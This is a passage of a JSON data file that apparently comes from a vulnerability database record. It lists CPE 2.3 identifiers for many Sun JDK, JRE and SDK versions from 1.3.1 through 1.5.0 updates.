"cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}]}
